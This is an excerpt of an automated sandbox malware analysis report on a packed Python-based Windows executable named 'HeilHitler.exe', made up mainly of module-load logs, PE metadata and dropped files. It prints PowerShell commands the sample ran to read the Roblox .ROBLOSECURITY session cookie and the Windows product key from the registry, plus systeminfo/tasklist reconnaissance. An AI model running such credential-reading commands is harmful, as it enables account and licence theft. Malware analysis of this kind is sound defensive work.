              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: HeilHitler.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: HeilHitler.exeStatic file information: File size 6251402 > 1048576
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HeilHitler.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: HeilHitler.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: HeilHitler.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdbhP source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039889853.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038522061.00007FFE11EB1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039368203.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.1908593127.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039626853.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: \0q.pdb source: powershell.exe, 00000026.00000002.1894620467.000002873381B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: HeilHitler.exe, 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037493230.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038127785.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038813190.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037789105.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdb source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
              Source: HeilHitler.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HeilHitler.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HeilHitler.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HeilHitler.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HeilHitler.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF31940 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF31940
              Source: 0qdpbrpq.dll.49.drStatic PE information: real checksum: 0x0 should be: 0xc052
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1286c2
              Source: libffi-7.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
              Source: python310.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x175084
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1116d
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x49ec0
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11295
              Source: HeilHitler.exeStatic PE information: real checksum: 0x600079 should be: 0x603940
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13959
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9855f
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3a1a3
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa1bc
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x121bd
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f136
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14f2d
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xe5dd
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x2283b
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16d12
              Source: libffi-7.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD692E4 push r10; retf 1_2_00007FFDFAD69350
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD6A2E5 push rsp; retf 1_2_00007FFDFAD6A2E6
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66C21 push r10; ret 1_2_00007FFDFAD66C23
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD69C02 push rsp; retf 1_2_00007FFDFAD69C03
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD691A3 push rdi; iretd 1_2_00007FFDFAD691A5
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD6A164 push rsp; ret 1_2_00007FFDFAD6A165
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD68F53 push r12; iretd 1_2_00007FFDFAD68F6A
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66F54 push r8; ret 1_2_00007FFDFAD66F5C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66F32 push r12; ret 1_2_00007FFDFAD66F4A
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD68EFE push r12; ret 1_2_00007FFDFAD68F25
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66ED0 push r12; ret 1_2_00007FFDFAD66EEE
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66EB6 push r10; retf 1_2_00007FFDFAD66EB9
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66E8C push rsp; iretd 1_2_00007FFDFAD66E8D
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66E9B push rsi; ret 1_2_00007FFDFAD66E9C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD68E66 push rbp; iretq 1_2_00007FFDFAD68E67
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD677EA push rsi; ret 1_2_00007FFDFAD67821
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66F8D push r10; ret 1_2_00007FFDFAD66FA0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD6855C push rbp; retf 1_2_00007FFDFAD68575
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66CEA push rdx; ret 1_2_00007FFDFAD66CF1
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66CF6 push r12; ret 1_2_00007FFDFAD66CF8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66CCC push r8; ret 1_2_00007FFDFAD66CD9
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD6A4A9 push rdx; ret 1_2_00007FFDFAD6A500
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66E44 push rdi; iretd 1_2_00007FFDFAD66E46
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD66DFB push rsp; ret 1_2_00007FFDFAD66E03
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD685A7 push r12; ret 1_2_00007FFDFAD685E3
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD69D85 push rsp; iretq 1_2_00007FFDFAD69D86
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AB7D2A5 pushad ; iretd 7_2_00007FFD9AB7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AC900BD pushad ; iretd 7_2_00007FFD9AC900C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AC9861D push ebx; ret 7_2_00007FFD9AC9862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AD69266 push esi; ret 7_2_00007FFD9AD69267
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD9ACB00BD pushad ; iretd 38_2_00007FFD9ACB00C1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\libffi-7.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pydJump to dropped file
